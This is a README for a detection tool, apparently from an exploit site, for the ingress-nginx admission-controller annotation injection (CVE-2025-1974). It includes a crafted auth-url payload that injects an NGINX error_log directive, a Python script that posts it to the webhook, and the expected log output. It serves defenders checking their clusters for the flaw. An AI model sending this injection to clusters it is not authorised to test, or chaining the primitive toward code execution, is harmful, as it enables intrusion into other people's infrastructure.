## https://sploitus.com/exploit?id=BE613A1F-5673-5A94-8EA0-39AA37E2CAC5
# 🚨 Log Injection Test via Ingress-NGINX Admission Controller

## 🧠 Overview
This script checks whether the ingress-nginx admission controller in a Kubernetes cluster accepts an Ingress annotation that injects a directive into the generated NGINX configuration. It is meant for **detection purposes only** in relation to [CVE-2025-1974](https://nvd.nist.gov/vuln/detail/CVE-2025-1974), the admission-controller weakness from the Wiz disclosure in which crafted annotations influence the NGINX configuration that the controller renders and tests.

## 📚 Background
The vulnerability, disclosed by Wiz.io ([blog post](https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities)), stems from annotation values being copied into the NGINX configuration template without adequate validation. A value that terminates the directive it is meant to populate and then opens a new one is parsed by NGINX as configuration rather than data. For instance:

```yaml
nginx.ingress.kubernetes.io/auth-url: "http://placeholder/#; error_log /root/this_path_shouldnt_exist.log debug; #"
```

When the admission webhook validates an Ingress, it renders the configuration and runs `nginx -t` on it, so the injected `error_log` directive is parsed at that point. Pointing it at a path the controller's unprivileged user cannot open produces a permission error that is visible without changing anything else in the cluster, which is what makes it a safe detection marker. In more advanced scenarios, Wiz showed that the same injection primitive can be chained with other techniques to achieve **remote code execution (RCE)** inside the controller pod.

## ๐Ÿ› ๏ธ What This Script Does
1. Loads a crafted `AdmissionReview` payload from a YAML file.
2. Sends it to the admission controller's `/validate` endpoint.
3. Prompts the user to check ingress controller logs for results.

## ๐Ÿ“ Files
- `admission_review.yaml`: Contains the crafted AdmissionReview request.
- `main.py`: Sends the payload to the controller.

## 🚀 Usage
First, forward the admission controller port:

```bash
kubectl port-forward -n ingress-nginx svc/ingress-nginx-controller-admission 8443:443
```

Then run:

```bash
python main.py --url https://localhost:8443
```

The webhook serves a self-signed certificate, so expect to disable TLS verification for the forwarded endpoint. If the controller answers with a 404, compare the path the script posts to with the `path` registered in the `ingress-nginx-admission` ValidatingWebhookConfiguration (upstream manifests register `/networking/v1/ingresses`).

## ๐Ÿ” Expected Result
Check ingress controller logs:

```bash
kubectl logs -n ingress-nginx -l app.kubernetes.io/component=controller
```

On a vulnerable controller you may see:
```
nginx: [emerg] open() "/root/this_path_shouldnt_exist.log" failed (13: Permission denied)
```

This line comes from `nginx -t` on the rendered configuration: the injected `error_log` directive was parsed, and NGINX tried to open the marker path, which the controller's unprivileged user cannot write to. The same `[emerg]` text is normally also returned in the webhook's denial message, so the script's response is worth reading alongside the logs. A patched controller rejects the annotation value before any configuration is rendered, so the marker path never appears.
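The procedure above (build the AdmissionReview, post it to the forwarded webhook, then look for the marker in the response and the controller logs) as one added example. This is not the repository's `main.py`; it constructs the payload in code instead of loading `admission_review.yaml`, and assumes the webhook path `/networking/v1/ingresses`, a self-signed certificate, and that ingress-nginx reports `nginx -t` failures in the AdmissionResponse `status.message`. The sample responses and log line in the usage note are constructed.

```python
"""Added example: submit a crafted AdmissionReview to the ingress-nginx webhook
and classify the outcome. Not the project's own code."""
import json
import ssl
import urllib.request
import uuid

# Marker path from the README: something the controller's unprivileged user cannot open.
MARKER_PATH = "/root/this_path_shouldnt_exist.log"
# The auth-url value shown in the Background section; closes the directive, adds error_log.
AUTH_URL_PAYLOAD = f"http://placeholder/#; error_log {MARKER_PATH} debug; #"


def build_admission_review(name="log-injection-test", namespace="default",
                           auth_url=AUTH_URL_PAYLOAD):
    """Return an admission.k8s.io/v1 AdmissionReview for a CREATE of a minimal
    Ingress carrying the crafted annotation (the Ingress object is constructed)."""
    ingress = {
        "apiVersion": "networking.k8s.io/v1",
        "kind": "Ingress",
        "metadata": {
            "name": name,
            "namespace": namespace,
            "annotations": {"nginx.ingress.kubernetes.io/auth-url": auth_url},
        },
        "spec": {
            "ingressClassName": "nginx",
            "rules": [{"host": "test.example", "http": {"paths": [{
                "path": "/", "pathType": "Prefix",
                "backend": {"service": {"name": "placeholder", "port": {"number": 80}}},
            }]}}],
        },
    }
    return {
        "apiVersion": "admission.k8s.io/v1",
        "kind": "AdmissionReview",
        "request": {
            "uid": str(uuid.uuid4()),
            "kind": {"group": "networking.k8s.io", "version": "v1", "kind": "Ingress"},
            "resource": {"group": "networking.k8s.io", "version": "v1",
                         "resource": "ingresses"},
            "name": name,
            "namespace": namespace,
            "operation": "CREATE",
            "userInfo": {"username": "log-injection-test"},
            "object": ingress,
        },
    }


def send_review(url, review, verify_tls=False):
    """POST the review and return the parsed AdmissionReview response.
    TLS verification is off by default because the webhook is self-signed
    (assumption: you are talking to your own port-forwarded endpoint)."""
    ctx = ssl.create_default_context()
    if not verify_tls:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(
        url, data=json.dumps(review).encode(),
        headers={"Content-Type": "application/json"}, method="POST")
    with urllib.request.urlopen(req, context=ctx, timeout=15) as resp:
        return json.loads(resp.read())


def classify(response, controller_logs="", marker=MARKER_PATH):
    """Decide whether the injected directive reached nginx.
    'injected' : marker path appears in the denial message, or in the logs next
                 to an nginx [emerg] line, i.e. nginx tried to open it as error_log
    'rejected' : denied without the marker (annotation validation caught it,
                 the expected result on a patched controller)
    'allowed'  : accepted; inspect the controller logs by hand"""
    resp = response.get("response", {}) or {}
    message = (resp.get("status", {}) or {}).get("message", "") or ""
    log_hit = marker in controller_logs and "[emerg]" in controller_logs
    if marker in message or log_hit:
        return "injected"
    if resp.get("allowed") is False:
        return "rejected"
    return "allowed"


if __name__ == "__main__":
    import argparse
    ap = argparse.ArgumentParser()
    ap.add_argument("--url", default="https://localhost:8443/networking/v1/ingresses")
    args = ap.parse_args()
    result = send_review(args.url, build_admission_review())
    print(json.dumps(result, indent=2))
    print("verdict:", classify(result))
```

Run it against the port-forward from the Usage section, then paste the output of the `kubectl logs` command into `classify(result, controller_logs=...)` if the verdict is `allowed`; a denial whose message quotes the marker path is already a positive result on its own.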

## โš ๏ธ Warning
For **educational and authorized testing only**. Do not run on systems without permission.

## 🔗 References
- [Wiz Blog: Breaking Ingress NGINX](https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities)
- [NGINX Ingress Annotations](https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/annotations/)
- [CVE-2025-1974](https://nvd.nist.gov/vuln/detail/CVE-2025-1974)

---
Use this tool to verify whether your cluster's ingress-nginx admission controller still accepts annotation injection. A positive result means the controller is unpatched; exploitation of this class of bug was part of the broader attack chain Wiz described that leads to remote code execution in the controller pod.